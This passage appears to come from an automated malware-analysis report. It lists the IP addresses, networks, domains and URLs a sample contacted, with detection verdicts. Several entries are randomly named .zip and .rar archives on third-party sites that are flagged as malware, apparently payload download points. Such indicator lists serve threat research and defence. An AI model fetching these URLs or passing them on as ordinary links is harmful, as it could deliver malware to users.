133296 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN false
46.28.239.13
 unknown Turkey
42910 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR false
198.57.200.100
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
69.164.207.140
 unknown United States
63949 LINODE-APLinodeLLCUS true
211.110.44.63
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
192.185.147.185
 unknown United States
26337 OIS1US false
132.148.96.144
 unknown United States
398101 GO-DADDY-COM-LLCUS false
64.37.52.138
 unknown United States
33182 DIMENOCUS false
194.225.58.214
 unknown Iran (ISLAMIC Republic Of)
43965 TUMS-IR-ASIR true

Contacted Domains

Name IP Active
bafnabrotherskesarwala.com 103.11.153.223 true
salaodigitalautomovel.pt.deve.pt 185.32.190.115 true
monitrade.net 192.185.147.185 true
laureys.be 85.17.252.207 true
artec.com.tr 46.28.239.13 true
cms.ivpr.org 64.37.52.138 true
gastronauts.asia 132.148.96.144 true
www.gastronauts.asia unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://laureys.be/cgi-sys/suspendedpage.cgi false
  • Avira URL Cloud: safe
 unknown
http://cms.ivpr.org/by9zwa7p1.zip true
  • Avira URL Cloud: malware
 unknown
http://bafnabrotherskesarwala.com/ys95lm6k.rar false
  • Avira URL Cloud: safe
 unknown
http://monitrade.net/h79fwesfe.rar true
  • Avira URL Cloud: malware
 unknown
http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip true
  • Avira URL Cloud: malware
 unknown
http://www.gastronauts.asia/ylztwx.rar false
  • Avira URL Cloud: safe
 unknown
http://laureys.be/uzssv27.rar true
  • Avira URL Cloud: malware
 unknown
http://artec.com.tr/xkpffwn.zip true
  • Avira URL Cloud: malware
 unknown